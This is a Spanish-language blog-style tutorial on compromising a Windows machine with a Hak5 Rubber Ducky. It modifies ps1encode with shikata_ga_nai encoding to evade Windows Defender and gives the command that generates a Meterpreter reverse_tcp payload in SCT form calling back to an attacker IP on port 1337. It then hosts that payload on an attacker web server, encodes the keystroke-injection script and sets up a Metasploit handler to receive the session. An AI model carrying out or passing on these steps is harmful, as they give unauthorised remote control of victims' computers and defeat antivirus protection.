La realidad tengo una tonelada de cosas para hacer pero queriendo salir de la rutina, miré hacia mi izquierda y vi ahí tirado un Rubber Ducky

Me propuse buscar la forma más fácil y rápida de obtener una sesión de meterpreter en el target, utilizando este hardware de Hak5.

La herramienta que necesitamos para generar el payload en formato .SCT es ps1encode, la descargamos desde aquí: https://github.com/CroweCybersecurity/ps1encode.

Vamos a realizarle una pequeña modificación, para saltarnos el Defender de ahora abrimos el script ps1encode.rb con cualquier editor de texto, y nos dirigimos a la línea 99. Allí, donde se ejecuta el comando que genera el payload, añadiremos lo siguiente: -e x86/shikata_ga_nai -b ‘\\x00’.

Quedará así:

Ahora sí, guardamos y utilizamos esta versión del script.
Generamos el payload con los siguientes parámetros: sudo ./ps1encode.rb –PAYLOAD windows/meterpreter/reverse_tcp –LHOST=[IP_ATACANTE] –LPORT=1337 -t sct

Esto nos creará un archivo llamado index.sct en esa misma carpeta. Lo que debemos hacer es asignar permisos 777 a ese archivo y moverlo a donde tenemos el servidor web en la máquina atacante. Usualmente en /var/www/html.
La idea es que este archivo .sct pueda ser accedido de la siguiente forma: http://IP_ATACANTE/index.sct.

La última línea que vemos en la salida del comando, es lo que se debe ejecutar en la máquina target. La copiaremos a nuestro script para el Rubber Ducky.

Ese es todo el script que necesitamos, en el lenguaje que entiende el Rubber Ducky. Entre algunos delay’s, lo que hace es abrir la ventana de “run” y escribir el comando necesario.

Utilizaremos la web: https://www.ducktoolkit.com/encoder/ para generar el .bin para el Rubber Ducky.

Un paso súper importante aquí, es seleccionar el idioma de teclado correcto a la derecha. En mi caso seleccioné “Spain” porque la máquina target tiene el teclado en español.

Presionamos en “Generate Script” y tras unos segundos contaremos con la siguiente opción:

Al presionar “Inject.bin” se nos descargará ese archivo, el cual tenemos que copiar a la MicroSD del Rubber Ducky.

Una vez hecho esto, ya tenemos el Rubber Ducky listo para usar. El siguiente paso es configurar el multi/handler de Metasploit para recibir la conexión inversa.

Una vez que conectamos el Rubber Ducky en la máquina target, obtenemos la sesión de meterpreter…

¡Happy Hacking!